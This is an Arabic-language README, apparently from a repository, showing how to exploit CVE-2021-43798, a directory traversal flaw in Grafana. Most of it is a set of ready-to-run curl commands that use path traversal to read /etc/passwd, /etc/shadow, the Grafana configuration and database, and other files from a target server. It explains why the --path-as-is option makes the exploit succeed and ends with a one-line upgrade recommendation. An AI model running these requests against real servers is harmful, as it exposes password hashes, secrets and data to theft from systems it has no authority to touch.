
يستعرض هذا المستودع استغلال CVE-2021-43798، وهي ثغرة اجتياز المسار (Directory Traversal) في Grafana. تسمح هذه الثغرة للمهاجمين بقراءة ملفات عشوائية على الخادم.
لاستغلال الثغرة يدويًا، يمكنك استخدام أحد أوامر curl التالية لمحاولة قراءة الملفات الحساسة:
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
في سياق استغلال ثغرة اجتياز المسار Grafana CVE-2021-43798، يُعد خيار --path-as-is ضروريًا لأنه يسمح بإرسال تسلسلات الاجتياز المصممة خصيصًا (../../../../../) مباشرة إلى الخادم دون تعديل. وقد يؤدي هذا إلى الوصول إلى ملفات حساسة على الخادم تقع خارج الدليل المقصود.
بدون --path-as-is، قد يقوم curl بتطبيع المسار إلى شيء مثل /public/plugins/Users/install.txt، وهو ما لن يستغل الثغرة. باستخدام --path-as-is، يتم الحفاظ على تسلسل الاجتياز الدقيق، مما يسمح للاستغلال بالنجاح.
يمكنك العثور على مزيد من التفاصيل حول خيار --path-as-is في توثيق curl. من خلال فهم واستخدام --path-as-is، يمكن لمتخصصي الأمن والباحثين إظهار واختبار ثغرات اجتياز المسار في تطبيقات الويب بشكل فعال.
للتخفيف من هذه الثغرة، قم بترقية Grafana إلى الإصدار 8.3.1 أو أحدث.